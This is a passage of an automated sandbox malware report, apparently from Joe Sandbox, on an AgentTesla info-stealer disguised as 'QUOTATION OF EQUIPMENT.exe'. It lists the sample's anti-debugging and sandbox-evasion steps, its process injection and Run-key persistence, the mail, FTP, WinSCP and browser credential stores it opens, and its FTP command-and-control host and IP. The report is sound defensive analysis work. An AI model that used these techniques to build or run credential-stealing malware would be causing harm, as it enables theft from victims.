                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe TID: 1304Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe TID: 3604Thread sleep count: 756 > 30
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe TID: 3604Thread sleep count: 9099 > 30
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWindow / User API: threadDelayed 756
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWindow / User API: threadDelayed 9099
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00402671 FindFirstFileA,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00404A29 FindFirstFileExW,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeThread delayed: delay time: 922337203685477
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566108651.000000000078B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPow
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_004067FE GetProcessHeap,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46402 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E466C7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46744 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46706 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46616 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_004035F1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_1_004035F1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0218F640 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401E1D SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_1_00401E1D SetUnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeMemory written: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess created: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566499923.0000000000D30000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566499923.0000000000D30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566499923.0000000000D30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566499923.0000000000D30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0040208D cpuid
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0592A9F8 GetUserNameW,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2451458.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2440000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2440000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2451458.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.22e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.7a9f68.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.7a9f68.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566777680.00000000022E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.568210008.0000000004812000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566108651.000000000078B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.565262027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION OF EQUIPMENT.exe PID: 6748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: QUOTATION OF EQUIPMENT.exe PID: 6716, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION OF EQUIPMENT.exe PID: 6716, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2451458.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2440000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2440000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION OF EQUIPMENT.exe.2451458.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.22e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.7a9f68.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.7a9f68.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566777680.00000000022E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.568210008.0000000004812000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566108651.000000000078B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.565262027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION OF EQUIPMENT.exe PID: 6748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: QUOTATION OF EQUIPMENT.exe PID: 6716, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information11Credentials in Registry1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing31NTDSSystem Information Discovery127Distributed Component Object ModelClipboard Data1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      QUOTATION OF EQUIPMENT.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      0.2.QUOTATION OF EQUIPMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                      1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.QUOTATION OF EQUIPMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                      0.0.QUOTATION OF EQUIPMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      ftp.omindexgroup.com2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      ftp://ftp.omindexgroup.com/info0%Avira URL Cloudsafe
                      http://kMfms0NpHAa2q.org0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://ftp.omindexgroup.com0%Avira URL Cloudsafe
                      http://yJUdUS.com0%Avira URL Cloudsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.omindexgroup.com
                      192.119.9.178
                      truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorQUOTATION OF EQUIPMENT.exefalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.org%GETMozilla/5.0QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        ftp://ftp.omindexgroup.com/infoQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorQUOTATION OF EQUIPMENT.exefalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                            high
                            http://kMfms0NpHAa2q.orgQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, QUOTATION OF EQUIPMENT.exe, 00000001.00000003.514210140.00000000005C4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipQUOTATION OF EQUIPMENT.exefalse
                            • URL Reputation: safe
                            unknown
                            http://ftp.omindexgroup.comQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://yJUdUS.comQUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org%$QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            192.119.9.178
                            ftp.omindexgroup.comUnited States
                            5508124SHELLSUStrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:502687
                            Start date:14.10.2021
                            Start time:09:46:19
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:QUOTATION OF EQUIPMENT.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:19
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/3@1/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 19.1% (good quality ratio 17.3%)
                            • Quality average: 75.2%
                            • Quality standard deviation: 32.9%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 2.20.178.24, 2.20.178.33, 209.197.3.8, 20.199.120.151, 40.112.88.60, 20.199.120.182, 20.54.110.249
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:47:33API Interceptor749x Sleep call for process: QUOTATION OF EQUIPMENT.exe modified
                            09:47:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                            09:47:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            192.119.9.178RFQ#1672100.exeGet hashmaliciousBrowse
                              Dekont.exeGet hashmaliciousBrowse
                                Lime_BIN01(1).exeGet hashmaliciousBrowse
                                  Machine Details.exeGet hashmaliciousBrowse
                                    28CUSTOMER_77299942_INVOICE_RECEIPT_CHLLC.exeGet hashmaliciousBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      ftp.omindexgroup.comRFQ#1672100.exeGet hashmaliciousBrowse
                                      • 192.119.9.178
                                      Dekont.exeGet hashmaliciousBrowse
                                      • 192.119.9.178

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      24SHELLSUSRFQ#1672100.exeGet hashmaliciousBrowse
                                      • 192.119.9.178
                                      mDWfu40kpV.exeGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      SecuriteInfo.com.win_rms_auto.7065.exeGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      Dekont.exeGet hashmaliciousBrowse
                                      • 192.119.9.178
                                      RFQ QUOTATION.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      QUOTATION OF EQUIPMENT.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      fs.exeGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      QUOTATION OF EQUIPMENT.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      RFQ # 1667170.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      PO321456.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      283871644940.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
